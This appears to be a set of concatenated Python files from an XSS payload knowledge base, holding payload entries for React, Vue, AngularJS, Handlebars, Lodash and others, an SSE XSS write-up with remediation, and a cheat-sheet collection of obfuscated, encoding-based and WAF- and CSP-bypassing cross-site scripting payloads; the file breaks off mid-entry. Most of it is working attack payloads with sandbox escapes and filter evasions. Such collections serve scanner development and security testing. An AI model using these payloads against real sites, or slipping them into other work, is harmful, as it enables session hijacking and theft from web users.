#!/usr/bin/env python3

"""
Project: BRS-KB
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-26
Status: Created

Framework-specific XSS Payloads
Covers React, Vue, Angular, jQuery, Backbone, Ember, Svelte
"""

from ..models import PayloadEntry


FRAMEWORK_PAYLOAD_DATABASE = {
    # ===== REACT XSS =====
    "react_dangerously_001": PayloadEntry(
        payload='<div dangerouslySetInnerHTML={{__html:"<img src=x onerror=alert(1)>"}}></div>',
        contexts=["html_content"],
        tags=["react", "dangerouslysetinnerhtml"],
        severity="high",
        cvss_score=7.5,
        description="React dangerouslySetInnerHTML XSS",
        reliability="high",
    ),
    "react_href_001": PayloadEntry(
        payload="javascript:alert(document.domain)",
        contexts=["href"],
        tags=["react", "href", "javascript"],
        severity="high",
        cvss_score=7.5,
        description="React href javascript protocol",
        reliability="high",
    ),
    "react_ssr_001": PayloadEntry(
        payload="</script><script>alert(1)</script>",
        contexts=["javascript"],
        tags=["react", "ssr", "nextjs"],
        severity="high",
        cvss_score=7.5,
        description="React SSR script injection",
        reliability="medium",
    ),
    # ===== VUE XSS =====
    "vue_vhtml_001": PayloadEntry(
        payload="<img src=x onerror=alert(1)>",
        contexts=["html_content"],
        tags=["vue", "v-html"],
        severity="high",
        cvss_score=7.5,
        description="Vue v-html directive XSS",
        reliability="high",
    ),
    "vue_template_001": PayloadEntry(
        payload='{{_c.constructor("alert(1)")()}}',
        contexts=["template"],
        tags=["vue", "template", "ssti"],
        severity="critical",
        cvss_score=9.0,
        description="Vue 2 template injection",
        reliability="medium",
    ),
    # ===== ANGULAR XSS =====
    "angular_bypass_001": PayloadEntry(
        payload='{{constructor.constructor("alert(1)")()}}',
        contexts=["template"],
        tags=["angular", "angularjs", "ssti"],
        severity="critical",
        cvss_score=9.0,
        description="AngularJS sandbox escape",
        reliability="high",
    ),
    "angular_bypass_002": PayloadEntry(
        payload='{{"a]".constructor.prototype.charAt=[].join;$eval("x]alert(1)//")}}',
        contexts=["template"],
        tags=["angular", "angularjs", "sandbox"],
        severity="critical",
        cvss_score=9.0,
        description="AngularJS 1.x sandbox bypass",
        reliability="medium",
    ),
    "angular_bypass_003": PayloadEntry(
        payload='{{$on.constructor("alert(1)")()}}',
        contexts=["template"],
        tags=["angular", "angularjs"],
        severity="critical",
        cvss_score=9.0,
        description="AngularJS $on bypass",
        reliability="medium",
    ),
    # ===== JQUERY XSS =====
    "jquery_html_001": PayloadEntry(
        payload="<img src=x onerror=alert(1)>",
        contexts=["html_content", "dom_xss"],
        tags=["jquery", "html"],
        severity="high",
        cvss_score=7.5,
        description="jQuery .html() XSS",
        reliability="high",
    ),
    "jquery_selector_001": PayloadEntry(
        payload="<img src=x onerror=alert(1)>",
        contexts=["html_content", "dom_xss"],
        tags=["jquery", "selector"],
        severity="high",
        cvss_score=7.5,
        description="jQuery selector XSS $('<payload>')",
        reliability="high",
    ),
    # ===== EMBER XSS =====
    "ember_htmlsafe_001": PayloadEntry(
        payload="<img src=x onerror=alert(1)>",
        contexts=["html_content"],
        tags=["ember", "htmlsafe"],
        severity="high",
        cvss_score=7.5,
        description="Ember htmlSafe() XSS",
        reliability="high",
    ),
    # ===== SVELTE XSS =====
    "svelte_html_001": PayloadEntry(
        payload="<img src=x onerror=alert(1)>",
        contexts=["html_content"],
        tags=["svelte", "@html"],
        severity="high",
        cvss_score=7.5,
        description="Svelte @html directive XSS",
        reliability="high",
    ),
    # ===== HANDLEBARS XSS =====
    "handlebars_html_001": PayloadEntry(
        payload="<img src=x onerror=alert(1)>",
        contexts=["html_content", "template"],
        tags=["handlebars", "triple-stash"],
        severity="high",
        cvss_score=7.5,
        description="Handlebars {{{unescaped}}} XSS",
        reliability="high",
    ),
    "handlebars_helper_001": PayloadEntry(
        payload='{{lookup (lookup this "constructor") "prototype"}}',
        contexts=["template"],
        tags=["handlebars", "prototype"],
        severity="critical",
        cvss_score=9.0,
        description="Handlebars prototype pollution",
        reliability="medium",
    ),
    # ===== EJS XSS =====
    "ejs_unescaped_001": PayloadEntry(
        payload="<img src=x onerror=alert(1)>",
        contexts=["html_content", "template"],
        tags=["ejs", "unescaped"],
        severity="high",
        cvss_score=7.5,
        description="EJS <%- unescaped %> XSS",
        reliability="high",
    ),
    # ===== PUG/JADE XSS =====
    "pug_unescaped_001": PayloadEntry(
        payload="<script>alert(1)</script>",
        contexts=["html_content", "template"],
        tags=["pug", "jade", "unescaped"],
        severity="high",
        cvss_score=7.5,
        description="Pug != unescaped XSS",
        reliability="high",
    ),
    # ===== LODASH XSS =====
    "lodash_template_001": PayloadEntry(
        payload='<%= constructor.constructor("alert(1)")() %>',
        contexts=["template"],
        tags=["lodash", "template", "rce"],
        severity="critical",
        cvss_score=9.5,
        description="Lodash template RCE",
        reliability="medium",
    ),
}

FRAMEWORK_TOTAL_PAYLOADS = len(FRAMEWORK_PAYLOAD_DATABASE)



#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-26 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

Angular Framework XSS Payloads
"""

from ..models import PayloadEntry


ANGULAR_PAYLOADS = {
    "angular_1": PayloadEntry(
        payload="{{constructor.constructor('alert(1)')()}}",
        contexts=["template"],
        severity="critical",
        cvss_score=8.5,
        description="AngularJS sandbox escape (1.x)",
        tags=["angular", "angularjs", "sandbox-escape"],
        reliability="high",
    ),
    "angular_2": PayloadEntry(
        payload="{{'a]'.constructor.prototype.charAt=[].join;$eval('x]alert(1)');}}",
        contexts=["template"],
        severity="critical",
        cvss_score=8.5,
        description="AngularJS 1.2.0-1.2.18 sandbox escape",
        tags=["angular", "angularjs", "sandbox-escape", "prototype"],
        reliability="medium",
    ),
    "angular_3": PayloadEntry(
        payload="{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x]alert(1)');}}",
        contexts=["template"],
        severity="critical",
        cvss_score=8.5,
        description="AngularJS 1.2.19-1.2.23 sandbox escape",
        tags=["angular", "angularjs", "sandbox-escape"],
        reliability="medium",
    ),
    "angular_4": PayloadEntry(
        payload='{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}',
        contexts=["template"],
        severity="critical",
        cvss_score=8.5,
        description="AngularJS 1.3.0-1.3.19 sandbox escape",
        tags=["angular", "angularjs", "sandbox-escape", "sort"],
        reliability="medium",
    ),
    "angular_5": PayloadEntry(
        payload="{{[].pop.constructor('alert(1)')()}}",
        contexts=["template"],
        severity="critical",
        cvss_score=8.5,
        description="AngularJS array method constructor",
        tags=["angular", "angularjs", "array", "constructor"],
        reliability="high",
    ),
    "angular_6": PayloadEntry(
        payload="<div [innerHTML]=\"'<img src=x onerror=alert(1)>'\"></div>",
        contexts=["html_content"],
        severity="critical",
        cvss_score=8.5,
        description="Angular 2+ innerHTML binding",
        tags=["angular", "angular2+", "innerHTML"],
        reliability="high",
    ),
    "angular_7": PayloadEntry(
        payload="{{$on.constructor('alert(1)')()}}",
        contexts=["template"],
        severity="critical",
        cvss_score=8.5,
        description="AngularJS $on constructor",
        tags=["angular", "angularjs", "$on"],
        reliability="medium",
    ),
    # === PortSwigger AngularJS Sandbox Escapes ===
    "ps-angular-1.0.1-1.1.5": PayloadEntry(
        payload="{{constructor.constructor('alert(1)')()}}",
        contexts=["html_content", "template"],
        severity="critical",
        cvss_score=9.0,
        description="AngularJS sandbox escape 1.0.1-1.1.5",
        tags=["portswigger", "angular", "sandbox-escape"],
        reliability="high",
        waf_evasion=True,
    ),
    "ps-angular-1.2.0-1.2.1": PayloadEntry(
        payload="{{a]constructor.prototype.charAt=[].join;$eval('x]alert(1)');}}",
        contexts=["html_content", "template"],
        severity="critical",
        cvss_score=9.0,
        description="AngularJS sandbox escape 1.2.0-1.2.1",
        tags=["portswigger", "angular", "sandbox-escape", "prototype"],
        reliability="high",
        waf_evasion=True,
    ),
    "ps-angular-1.2.2-1.2.5": PayloadEntry(
        payload="{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a]alert(1)//';}}",
        contexts=["html_content", "template"],
        severity="critical",
        cvss_score=9.0,
        description="AngularJS sandbox escape 1.2.2-1.2.5",
        tags=["portswigger", "angular", "sandbox-escape"],
        reliability="high",
        waf_evasion=True,
    ),
    "ps-angular-1.2.6-1.2.18": PayloadEntry(
        payload="{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}",
        contexts=["html_content", "template"],
        severity="critical",
        cvss_score=9.0,
        description="AngularJS sandbox escape 1.2.6-1.2.18",
        tags=["portswigger", "angular", "sandbox-escape"],
        reliability="high",
        waf_evasion=True,
    ),
    "ps-angular-1.2.19-1.2.23": PayloadEntry(
        payload='{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}',
        contexts=["html_content", "template"],
        severity="critical",
        cvss_score=9.0,
        description="AngularJS sandbox escape 1.2.19-1.2.23",
        tags=["portswigger", "angular", "sandbox-escape", "sort"],
        reliability="high",
        waf_evasion=True,
    ),
    "ps-angular-1.2.24-1.2.29": PayloadEntry(
        payload='{{"a]".constructor.prototype.charAt="".valueOf;$eval("x]alert(1)//");}}',
        contexts=["html_content", "template"],
        severity="critical",
        cvss_score=9.0,
        description="AngularJS sandbox escape 1.2.24-1.2.29",
        tags=["portswigger", "angular", "sandbox-escape"],
        reliability="high",
        waf_evasion=True,
    ),
    "ps-angular-1.3.0": PayloadEntry(
        payload="{{!ready && (ready = true) && (! constructor.prototype.charAt = [].join) && $eval('x]alert(1)//');}}",
        contexts=["html_content", "template"],
        severity="critical",
        cvss_score=9.0,
        description="AngularJS sandbox escape 1.3.0",
        tags=["portswigger", "angular", "sandbox-escape"],
        reliability="high",
        waf_evasion=True,
    ),
    "ps-angular-1.3.1-1.3.2": PayloadEntry(
        payload="{{a]constructor.prototype.charAt=[].join;$eval('x]alert(1)');}}",
        contexts=["html_content", "template"],
        severity="critical",
        cvss_score=9.0,
        description="AngularJS sandbox escape 1.3.1-1.3.2",
        tags=["portswigger", "angular", "sandbox-escape"],
        reliability="high",
        waf_evasion=True,
    ),
    "ps-angular-1.4.0-1.4.9": PayloadEntry(
        payload="{{'a]'.constructor.prototype.charAt=[].join;$eval('x]alert(1)');}}",
        contexts=["html_content", "template"],
        severity="critical",
        cvss_score=9.0,
        description="AngularJS sandbox escape 1.4.0-1.4.9",
        tags=["portswigger", "angular", "sandbox-escape"],
        reliability="high",
        waf_evasion=True,
    ),
    "ps-angular-1.5.0-1.5.8": PayloadEntry(
        payload="{{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x]alert(1)');}}",
        contexts=["html_content", "template"],
        severity="critical",
        cvss_score=9.0,
        description="AngularJS sandbox escape 1.5.0-1.5.8",
        tags=["portswigger", "angular", "sandbox-escape"],
        reliability="high",
        waf_evasion=True,
    ),
    "ps-angular-1.6.0+": PayloadEntry(
        payload="{{$on.constructor('alert(1)')()}}",
        contexts=["html_content", "template"],
        severity="critical",
        cvss_score=9.0,
        description="AngularJS 1.6.0+ (no sandbox)",
        tags=["portswigger", "angular", "1.6+"],
        reliability="high",
    ),
    "ps-csp-angular-callback": PayloadEntry(
        payload="<script src=\"https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js\"></script><div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>",
        contexts=["html_content"],
        severity="critical",
        cvss_score=9.0,
        description="AngularJS CSP bypass via JSONP callback",
        tags=["portswigger", "csp-bypass", "angular", "jsonp"],
        reliability="high",
        waf_evasion=True,
        bypasses=["csp"],
    ),
}

ANGULAR_PAYLOADS_TOTAL = len(ANGULAR_PAYLOADS)



#!/usr/bin/env python3

"""
Project: BRS-KB
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-26
Status: Created
Telegram: https://t.me/easyprotech

Knowledge Base: Server-Sent Events (SSE) XSS Context
"""

DETAILS = {
    "title": "Cross-Site Scripting (XSS) via Server-Sent Events",
    "severity": "high",
    "cvss_score": 7.2,
    "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N",
    "reliability": "certain",
    "cwe": ["CWE-79"],
    "owasp": ["A03:2021"],
    "tags": ["xss", "sse", "eventsource", "streaming", "realtime", "push"],
    "description": """
Server-Sent Events (SSE) XSS occurs when data pushed via EventSource is rendered in the DOM
without sanitization. SSE is used for real-time updates in dashboards, notifications, and feeds.

SEVERITY: HIGH
SSE data is often trusted as it comes from the server. Developers may not sanitize SSE payloads.
Can be exploited if attacker can inject into SSE stream or influence SSE data sources.
""",
    "attack_vector": """
SSE DATA INJECTION:
data: <script>alert(1)</script>

SSE EVENT TYPE XSS:
event: <img src=x onerror=alert(1)>
data: test

SSE ID INJECTION:
id: <script>alert(1)</script>
data: test

MULTILINE DATA:
data: {"html": "<img src=x onerror=alert(1)>"}
data: continued

SSE RETRY INJECTION:
retry: 1000
data: <script>alert(1)</script>

UNSAFE HANDLER:
source.onmessage = e => div.innerHTML = e.data;

JSON IN SSE:
data: {"notification": "<b onclick=alert(1)>Click</b>"}

SSE COMMENT BYPASS:
: comment
data: <script>alert(1)</script>
""",
    "remediation": """
DEFENSE:

1. SANITIZE all SSE data before DOM insertion
2. Use textContent, not innerHTML
3. Parse JSON and validate schema
4. Encode HTML entities server-side
5. Implement CSP
6. Validate event types
7. Use typed message handlers

SAFE SSE HANDLING:
source.onmessage = (event) => {
  const data = JSON.parse(event.data);
  element.textContent = data.message;  // Safe
};

UNSAFE:
source.onmessage = (event) => {
  element.innerHTML = event.data;  // DANGEROUS
};

OWASP REFERENCES:
- CWE-79: Cross-site Scripting
- Real-time Security Best Practices
""",
}



#!/usr/bin/env python3

"""
Project: BRS-KB
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-26

Source: https://github.com/heroanswer/XSS_Cheat_Sheet_2020_Edition
BruteLogic XSS Cheat Sheet 2020 Edition
"""

from ..models import PayloadEntry


BRS_KB_BRUTELOGIC_2020_DATABASE = {
    # ===== URL/LOCATION BASED =====
    "bl2020_url_001": PayloadEntry(
        payload="eval(URL.slice(-8)) #alert(1)",
        contexts=["javascript", "url"],
        tags=["brutelogic", "url", "eval"],
        severity="high",
        cvss_score=7.5,
        description="Eval URL fragment",
        reliability="high",
    ),
    "bl2020_url_002": PayloadEntry(
        payload="eval(location.hash.slice(1)) #alert(1)",
        contexts=["javascript", "url"],
        tags=["brutelogic", "hash", "eval"],
        severity="high",
        cvss_score=7.5,
        description="Eval location hash",
        reliability="high",
    ),
    "bl2020_url_003": PayloadEntry(
        payload="document.write(decodeURI(location.hash)) #<img/src/onerror=alert(1)>",
        contexts=["javascript", "url"],
        tags=["brutelogic", "hash", "document.write"],
        severity="high",
        cvss_score=7.5,
        description="Document.write hash payload",
        reliability="high",
    ),
    "bl2020_url_004": PayloadEntry(
        payload='<svg id=eval onload=top[id](" \' "+URL)>',
        contexts=["html_content", "svg"],
        tags=["brutelogic", "url", "svg"],
        severity="high",
        cvss_score=7.5,
        description="SVG eval via URL",
        reliability="medium",
    ),
    "bl2020_url_005": PayloadEntry(
        payload='<svg onload=eval(" \' "+URL)>',
        contexts=["html_content", "svg"],
        tags=["brutelogic", "url", "svg"],
        severity="high",
        cvss_score=7.5,
        description="SVG onload eval URL",
        reliability="medium",
    ),
    "bl2020_url_006": PayloadEntry(
        payload="${alert(1)}<svg onload=eval('`//'+URL)>",
        contexts=["html_content", "template"],
        tags=["brutelogic", "url", "template"],
        severity="high",
        cvss_score=7.5,
        description="Template literal URL eval",
        reliability="medium",
    ),
    # ===== NUMERIC OBFUSCATION =====
    "bl2020_num_001": PayloadEntry(
        payload="top[8680439..toString(30)](1)",
        contexts=["javascript"],
        tags=["brutelogic", "obfuscation", "number"],
        severity="high",
        cvss_score=7.5,
        description="Number to string alert",
        reliability="high",
    ),
    # ===== FUNCTION REFERENCE TRICKS =====
    "bl2020_func_001": PayloadEntry(
        payload="[1].find(alert)",
        contexts=["javascript"],
        tags=["brutelogic", "array", "find"],
        severity="high",
        cvss_score=7.5,
        description="Array.find callback",
        reliability="high",
    ),
    "bl2020_func_002": PayloadEntry(
        payload="a=alert,a(1)",
        contexts=["javascript"],
        tags=["brutelogic", "assignment"],
        severity="high",
        cvss_score=7.5,
        description="Alert assignment",
        reliability="high",
    ),
    "bl2020_func_003": PayloadEntry(
        payload="(alert)(1)",
        contexts=["javascript"],
        tags=["brutelogic", "parentheses"],
        severity="high",
        cvss_score=7.5,
        description="Parenthesized alert",
        reliability="high",
    ),
    "bl2020_func_004": PayloadEntry(
        payload="top[/al/.source+/ert/.source](1)",
        contexts=["javascript"],
        tags=["brutelogic", "regex", "obfuscation"],
        severity="high",
        cvss_score=7.5,
        description="Regex source concat",
        reliability="high",
    ),
    # ===== WRITE TRICKS =====
    "bl2020_write_001": PayloadEntry(
        payload="write`XSSed!`",
        contexts=["javascript"],
        tags=["brutelogic", "write", "template"],
        severity="high",
        cvss_score=7.5,
        description="Tagged template write",
        reliability="high",
    ),
    "bl2020_write_002": PayloadEntry(
        payload="write`<img/src/o&#78error=alert&lpar;1)&gt;`",
        contexts=["javascript"],
        tags=["brutelogic", "write", "entity"],
        severity="high",
        cvss_score=7.5,
        description="Write with entities",
        reliability="medium",
    ),
    "bl2020_write_003": PayloadEntry(
        payload="write('\\74img/src/o\\156error\\75alert\\501\\51\\76')",
        contexts=["javascript"],
        tags=["brutelogic", "write", "octal"],
        severity="high",
        cvss_score=7.5,
        description="Write with octal escape",
        reliability="medium",
    ),
    # ===== FIREFOX SPECIFIC EVENTS =====
    "bl2020_ff_001": PayloadEntry(
        payload="<x onafterscriptexecute=alert(1)><script>1</script>",
        contexts=["html_content"],
        tags=["brutelogic", "firefox", "event"],
        severity="high",
        cvss_score=7.5,
        description="Firefox onafterscriptexecute",
        reliability="medium",
    ),
    "bl2020_ff_002": PayloadEntry(
        payload="<x onbeforescriptexecute=alert(1)><script>1</script>",
        contexts=["html_content"],
        tags=["brutelogic", "firefox", "event"],
        severity="high",
        cvss_score=7.5,
        description="Firefox onbeforescriptexecute",
        reliability="medium",
    ),
    # ===== MOBILE EVENTS =====
    "bl2020_mobile_001": PayloadEntry(
        payload="<body onorientationchange=alert(1)>",
        contexts=["html_content"],
        tags=["brutelogic", "mobile", "orientation"],
        severity="high",
        cvss_score=7.5,
        description="Mobile orientation change",
        reliability="medium",
    ),
    "bl2020_mobile_002": PayloadEntry(
        payload="<html ontouchstart=alert(1)>",
        contexts=["html_content"],
        tags=["brutelogic", "mobile", "touch"],
        severity="high",
        cvss_score=7.5,
        description="Mobile touchstart",
        reliability="high",
    ),
    "bl2020_mobile_003": PayloadEntry(
        payload="<html ontouchend=alert(1)>",
        contexts=["html_content"],
        tags=["brutelogic", "mobile", "touch"],
        severity="high",
        cvss_score=7.5,
        description="Mobile touchend",
        reliability="high",
    ),
    "bl2020_mobile_004": PayloadEntry(
        payload="<html ontouchmove=alert(1)>",
        contexts=["html_content"],
        tags=["brutelogic", "mobile", "touch"],
        severity="high",
        cvss_score=7.5,
        description="Mobile touchmove",
        reliability="high",
    ),
    # ===== BODY EVENTS =====
    "bl2020_body_001": PayloadEntry(
        payload="<body onhelp=alert(1)>press F1!",
        contexts=["html_content"],
        tags=["brutelogic", "body", "help"],
        severity="high",
        cvss_score=7.5,
        description="Body onhelp (IE/Edge)",
        reliability="low",
    ),
    "bl2020_body_002": PayloadEntry(
        payload="<body onhashchange=alert(1)><meta content=URL;%23 http-equiv=refresh>",
        contexts=["html_content"],
        tags=["brutelogic", "body", "hashchange"],
        severity="high",
        cvss_score=7.5,
        description="Hashchange via meta refresh",
        reliability="high",
    ),
    "bl2020_body_003": PayloadEntry(
        payload="<body onscroll=alert(1) style=overflow:auto;height:1000px id=x>#x",
        contexts=["html_content"],
        tags=["brutelogic", "body", "scroll"],
        severity="high",
        cvss_score=7.5,
        description="Body scroll via anchor",
        reliability="high",
    ),
    "bl2020_body_004": PayloadEntry(
        payload="<body onresize=alert(1)>press F12!",
        contexts=["html_content"],
        tags=["brutelogic", "body", "resize"],
        severity="high",
        cvss_score=7.5,
        description="Body resize via DevTools",
        reliability="medium",
    ),
    # ===== SVG SET/ANIMATE =====
    "bl2020_svg_001": PayloadEntry(
        payload="<svg><set onbegin=alert(1)>",
        contexts=["html_content", "svg"],
        tags=["brutelogic", "svg", "set"],
        severity="high",
        cvss_score=7.5,
        description="SVG set onbegin",
        reliability="high",
    ),
    "bl2020_svg_002": PayloadEntry(
        payload="<svg><set end=1 onend=alert(1)>",
        contexts=["html_content", "svg"],
        tags=["brutelogic", "svg", "set"],
        severity="high",
        cvss_score=7.5,
        description="SVG set onend",
        reliability="medium",
    ),
    "bl2020_svg_003": PayloadEntry(
        payload="<svg><a><rect width=99% height=99% /><animate attributeName=href to=javascript:alert(1)>",
        contexts=["html_content", "svg"],
        tags=["brutelogic", "svg", "animate"],
        severity="high",
        cvss_score=7.5,
        description="SVG animate href",
        reliability="medium",
    ),
    "bl2020_svg_004": PayloadEntry(
        payload="<svg><a><rect width=99% height=99% /><animate attributeName=href values=javascript:alert(1)>",
        contexts=["html_content", "svg"],
        tags=["brutelogic", "svg", "animate"],
        severity="high",
        cvss_score=7.5,
        description="SVG animate values",
        reliability="medium",
    ),
    # ===== SSI INJECTION =====
    "bl2020_ssi_001": PayloadEntry(
        payload='<<!--%23set var="x" value="svg onload=alert(1)"--><!--%23echo var="x"-->>',
        contexts=["html_content"],
        tags=["brutelogic", "ssi", "injection"],
        severity="critical",
        cvss_score=9.0,
        description="SSI to XSS",
        reliability="low",
    ),
    # ===== ANGULAR BYPASSES =====
    "bl2020_ng_001": PayloadEntry(
        payload="{{$new.constructor('alert(1)')()}}",
        contexts=["template", "angular"],
        tags=["brutelogic", "angular", "sandbox"],
        severity="critical",
        cvss_score=9.0,
        description="Angular sandbox escape $new",
        reliability="high",
    ),
    "bl2020_ng_002": PayloadEntry(
        payload="<x ng-app>{{$new.constructor('alert(1)')()}}",
        contexts=["html_content", "angular"],
        tags=["brutelogic", "angular", "ng-app"],
        severity="critical",
        cvss_score=9.0,
        description="Angular ng-app XSS",
        reliability="high",
    ),
    "bl2020_ng_003": PayloadEntry(
        payload="<x ng-init=a='alert(1)'>{{$new.constructor(a)()}}",
        contexts=["html_content", "angular"],
        tags=["brutelogic", "angular", "ng-init"],
        severity="critical",
        cvss_score=9.0,
        description="Angular ng-init XSS",
        reliability="high",
    ),
    "bl2020_ng_004": PayloadEntry(
        payload="{{$new.constructor&#40'alert\\u00281\\u0029'&#41&#40&#41}}",
        contexts=["template", "angular"],
        tags=["brutelogic", "angular", "entity"],
        severity="critical",
        cvss_score=9.0,
        description="Angular entity encoded",
        reliability="medium",
    ),
    # ===== OPEN/TOP TRICKS =====
    "bl2020_open_001": PayloadEntry(
        payload="top.open`javas\\cript:al\\ert\\x281\\x29`",
        contexts=["javascript"],
        tags=["brutelogic", "open", "escape"],
        severity="high",
        cvss_score=7.5,
        description="Top.open with escapes",
        reliability="medium",
    ),
    "bl2020_open_002": PayloadEntry(
        payload="top.open`javas\\cript:al\\ert\\x281\\x29${0}0`",
        contexts=["javascript"],
        tags=["brutelogic", "open", "template"],
        severity="high",
        cvss_score=7.5,
        description="Top.open template literal",
        reliability="medium",
    ),
    # ===== NOTIFICATION API =====
    "bl2020_notif_001": PayloadEntry(
        payload="Notification.requestPermission(x=>{new(Notification)(1)})",
        contexts=["javascript"],
        tags=["brutelogic", "notification"],
        severity="medium",
        cvss_score=5.0,
        description="Notification API abuse",
        reliability="medium",
    ),
    "bl2020_notif_002": PayloadEntry(
        payload="new(Notification)(1)",
        contexts=["javascript"],
        tags=["brutelogic", "notification"],
        severity="medium",
        cvss_score=5.0,
        description="Simple Notification",
        reliability="medium",
    ),
    # ===== ONERROR THROW =====
    "bl2020_throw_001": PayloadEntry(
        payload="';onerror=alert;throw 1//",
        contexts=["javascript", "js_string"],
        tags=["brutelogic", "throw", "onerror"],
        severity="high",
        cvss_score=7.5,
        description="Throw onerror technique",
        reliability="high",
    ),
    # ===== POINTER EVENTS =====
    "bl2020_pointer_001": PayloadEntry(
        payload='"onpointerover=alert(1) //',
        contexts=["html_attribute"],
        tags=["brutelogic", "pointer"],
        severity="high",
        cvss_score=7.5,
        description="Pointer over event",
        reliability="high",
    ),
    "bl2020_pointer_002": PayloadEntry(
        payload='"autofocus onfocusin=alert(1) //',
        contexts=["html_attribute"],
        tags=["brutelogic", "focusin"],
        severity="high",
        cvss_score=7.5,
        description="Focusin with autofocus",
        reliability="high",
    ),
    # ===== TAG SPLITTING =====
    "bl2020_split_001": PayloadEntry(
        payload='"o<x>nmouseover=alert<x>(1)//',
        contexts=["html_attribute"],
        tags=["brutelogic", "split", "waf_bypass"],
        severity="high",
        cvss_score=7.5,
        description="Tag split bypass",
        reliability="medium",
    ),
    "bl2020_split_002": PayloadEntry(
        payload='"autof<x>ocus o<x>nfocus=alert<x>(1)//',
        contexts=["html_attribute"],
        tags=["brutelogic", "split", "waf_bypass"],
        severity="high",
        cvss_score=7.5,
        description="Autofocus split bypass",
        reliability="medium",
    ),
    # ===== SCRIPT POLYGLOTS =====
    "bl2020_poly_001": PayloadEntry(
        payload="GIF89a=//<script>\nalert(1)//</script>;",
        contexts=["html_content"],
        tags=["brutelogic", "polyglot", "gif"],
        severity="high",
        cvss_score=7.5,
        description="GIF/JS polyglot",
        reliability="medium",
    ),
    # ===== COMMENT BREAK =====
    "bl2020_comment_001": PayloadEntry(
        payload="<!--><svg onload=alert(1)-->",
        contexts=["html_content", "html_comment"],
        tags=["brutelogic", "comment"],
        severity="high",
        cvss_score=7.5,
        description="Malformed comment break",
        reliability="medium",
    ),
    # ===== TRANSITION EVENTS =====
    "bl2020_transition_001": PayloadEntry(
        payload="<x ontransitionrun=alert(1)><style>*{transition:color 1s}*:hover{color:red}",
        contexts=["html_content"],
        tags=["brutelogic", "transition"],
        severity="high",
        cvss_score=7.5,
        description="Transition run event",
        reliability="medium",
    ),
    "bl2020_transition_002": PayloadEntry(
        payload="<x ontransitionstart=alert(1)><style>*{transition:color 1s}*:hover{color:red}",
        contexts=["html_content"],
        tags=["brutelogic", "transition"],
        severity="high",
        cvss_score=7.5,
        description="Transition start event",
        reliability="medium",
    ),
    "bl2020_transition_003": PayloadEntry(
        payload="<x ontransitioncancel=alert(1)><style>*{transition:color 1s}*:hover{color:red}",
        contexts=["html_content"],
        tags=["brutelogic", "transition"],
        severity="high",
        cvss_score=7.5,
        description="Transition cancel event",
        reliability="low",
    ),
    "bl2020_transition_004": PayloadEntry(
        payload="<x onwebkitanimationend=alert(1)><style>x{animation:s}@keyframes s{}",
        contexts=["html_content"],
        tags=["brutelogic", "webkit", "animation"],
        severity="high",
        cvss_score=7.5,
        description="Webkit animation end",
        reliability="medium",
    ),
    "bl2020_transition_005": PayloadEntry(
        payload="<x onwebkitanimationstart=alert(1)><style>x{animation:s}@keyframes s{}",
        contexts=["html_content"],
        tags=["brutelogic", "webkit", "animation"],
        severity="high",
        cvss_score=7.5,
        description="Webkit animation start",
        reliability="medium",
    ),
    # ===== DOUBLE ENCODING =====
    "bl2020_enc_001": PayloadEntry(
        payload="%253Csvg%2520o%256Eload%253Dalert%25281%2529%253E",
        contexts=["url"],
        tags=["brutelogic", "double_encoding"],
        severity="high",
        cvss_score=7.5,
        description="Double URL encoded SVG",
        reliability="medium",
    ),
    "bl2020_enc_002": PayloadEntry(
        payload="%2522%253E%253Csvg%2520o%256Eload%253Dalert%25281%2529%253E",
        contexts=["url"],
        tags=["brutelogic", "double_encoding"],
        severity="high",
        cvss_score=7.5,
        description="Double encoded breakout",
        reliability="medium",
    ),
    # ===== OCTAL ESCAPES =====
    "bl2020_octal_001": PayloadEntry(
        payload="[]['\\146\\151\\154\\164\\145\\162']['\\143\\157\\156\\163\\164\\162\\165\\143\\164\\157\\162']('\\141\\154\\145\\162\\164\\50\\61\\51')()",
        contexts=["javascript"],
        tags=["brutelogic", "octal", "obfuscation"],
        severity="high",
        cvss_score=7.5,
        description="Full octal obfuscation",
        reliability="high",
    ),
    # ===== ENTITY TRICKS =====
    "bl2020_entity_001": PayloadEntry(
        payload="<svg onload=alert&lpar;1&rpar;>",
        contexts=["html_content", "svg"],
        tags=["brutelogic", "entity"],
        severity="high",
        cvss_score=7.5,
        description="Named entity parens",
        reliability="high",
    ),
    "bl2020_entity_002": PayloadEntry(
        payload="<svg onload=alert&#40;1&#41>",
        contexts=["html_content", "svg"],
        tags=["brutelogic", "entity"],
        severity="high",
        cvss_score=7.5,
        description="Decimal entity parens",
        reliability="high",
    ),
    "bl2020_entity_003": PayloadEntry(
        payload="<SVG ONLOAD=&#97&#108&#101&#114&#116(1)>",
        contexts=["html_content", "svg"],
        tags=["brutelogic", "entity", "uppercase"],
        severity="high",
        cvss_score=7.5,
        description="Entity encoded handler",
        reliability="high",
    ),
    # ===== SCROLL TRIGGER =====
    "bl2020_scroll_001": PayloadEntry(
        payload="<p style=overflow:auto;font-size:999px onscroll=alert(1)>AAA<x/id=y></p>#y",
        contexts=["html_content"],
        tags=["brutelogic", "scroll", "overflow"],
        severity="high",
        cvss_score=7.5,
        description="Scroll via overflow",
        reliability="high",
    ),
    # ===== AUDIO/VIDEO =====
    "bl2020_media_001": PayloadEntry(
        payload="<audio src onloadstart=alert(1)>",
        contexts=["html_content"],
        tags=["brutelogic", "audio"],
        severity="high",
        cvss_score=7.5,
        description="Audio loadstart",
        reliability="high",
    ),
    "bl2020_media_002": PayloadEntry(
